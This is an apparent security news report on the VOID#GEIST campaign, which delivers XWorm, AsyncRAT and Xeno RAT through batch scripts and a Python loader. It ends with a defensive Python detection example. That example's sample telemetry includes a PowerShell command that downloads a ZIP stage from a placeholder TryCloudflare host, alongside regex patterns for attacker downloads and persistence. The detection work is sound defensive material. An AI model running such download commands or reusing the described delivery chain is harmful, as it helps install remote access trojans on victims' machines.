Multi-Stage Malware Campaign Delivers XWorm, AsyncRAT, and XenoRAT via VOID#GEIST
Cybersecurity Researchers Uncover Sophisticated Malware Campaign
Cybersecurity researchers have uncovered a sophisticated multi-stage malware campaign that utilizes batch scripts to deliver various encrypted remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT. Dubbed VOID#GEIST, this stealthy attack chain employs a complex, script-based delivery framework that mimics legitimate user activity.
Initial Stage of the Attack
The initial stage of the attack begins with a batch script fetched from a TryCloudflare domain, often distributed via phishing emails. Upon execution, the script deliberately avoids escalating privileges, instead leveraging the permission rights of the currently logged-in user to establish an initial foothold. This allows the malware to blend into seemingly innocuous administrative operations.
Malware Persistence and Payload Delivery
The script then opens a decoy PDF document in Google Chrome in full-screen mode to distract the user while it runs a PowerShell command that re-launches the original batch script. This second instance establishes persistence across system reboots by placing an auxiliary batch script in the Windows user’s Startup directory.
The persistence method operates entirely within the current user’s privilege context and avoids more intrusive techniques, which lowers the chance of raising privilege-escalation prompts or registry-monitoring alerts.
Final Stage of the Attack
The next phase of the attack involves the malware reaching out to a TryCloudflare domain to fetch additional payloads in the form of ZIP archives. These archives contain multiple files, including a Python-based loader script, encrypted shellcode payloads corresponding to XWorm, Xeno RAT, and AsyncRAT, and key files containing decryption keys.
The attack sequence then deploys a legitimate embedded Python runtime fetched directly from python.org, which offers portability, reliability, and stealth and lets the malware run even when the infected endpoint has no Python installed.
The Python runtime is used to launch the loader script, which decrypts and runs the XWorm payload using Early Bird APC injection. The malware also leverages a legitimate Microsoft binary to invoke Python and launch Xeno RAT. In the final stage, the loader uses the same injection mechanism to launch AsyncRAT.
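The three observable steps above (a batch script dropped into the per-user Startup folder, a fetch from a TryCloudflare quick-tunnel hostname, and python.exe running from a user-writable path) can be turned into simple telemetry rules. The following is an added detection example, not code from the researchers' report; the event fields, regexes and sample events are constructed assumptions modelled on Sysmon-style process-creation and file-write records.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str             # "process" (creation) or "file" (write)
    image: str = ""       # executable path of the created process
    cmdline: str = ""     # its full command line
    target: str = ""      # path written, for "file" events

# Per-user Startup folder receiving a .bat/.cmd (the persistence step)
STARTUP_BAT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(bat|cmd)$", re.I)
# python.exe living under a user-writable tree (the dropped embedded runtime)
USER_WRITABLE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\(AppData|Downloads)\\", re.I)
# A command line that fetches from a TryCloudflare quick-tunnel hostname
TUNNEL_URL = re.compile(r"https?://[^\s\"']*\.trycloudflare\.com", re.I)

def startup_batch_dropped(ev: Event) -> bool:
    return ev.kind == "file" and bool(STARTUP_BAT.search(ev.target))

def tunnel_download(ev: Event) -> bool:
    return ev.kind == "process" and bool(TUNNEL_URL.search(ev.cmdline))

def portable_python(ev: Event) -> bool:
    return (ev.kind == "process" and ev.image.lower().endswith("\\python.exe")
            and bool(USER_WRITABLE.match(ev.image)))

RULES = {"startup_batch": startup_batch_dropped,
         "tunnel_download": tunnel_download,
         "portable_python": portable_python}

def triage(events):
    """Map each rule name to the events it fired on; an empty dict means clean."""
    hits = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev)
    return hits

# Constructed sample telemetry; paths and hostnames are placeholders, not IoCs.
SAMPLE = [
    Event("process", image=r"C:\Windows\System32\cmd.exe",
          cmdline=r'cmd.exe /c "C:\Users\alice\Downloads\invoice.bat"'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell -c iwr https://placeholder-tunnel.trycloudflare.com/stage.zip -OutFile stage.zip"),
    Event("file", target=r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat"),
    Event("process", image=r"C:\Users\alice\AppData\Local\Temp\py\python.exe", cmdline="python.exe loader.py"),
    Event("process", image=r"C:\Program Files\Python312\python.exe", cmdline="python.exe -m pip list"),  # benign
]
```

Calling `triage(SAMPLE)` fires all three rules once each while leaving the system-wide Python install unflagged; in practice the same rules would be applied to a stream of real endpoint events rather than the constructed list.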
Conclusion
Researchers note that this attack demonstrates the increasing shift towards complex, script-based delivery frameworks that closely mimic legitimate user activity. The use of fileless execution mechanisms and legitimate embedded runtimes allows the malware to operate without triggering security alerts, highlighting the need for robust detection and prevention measures.
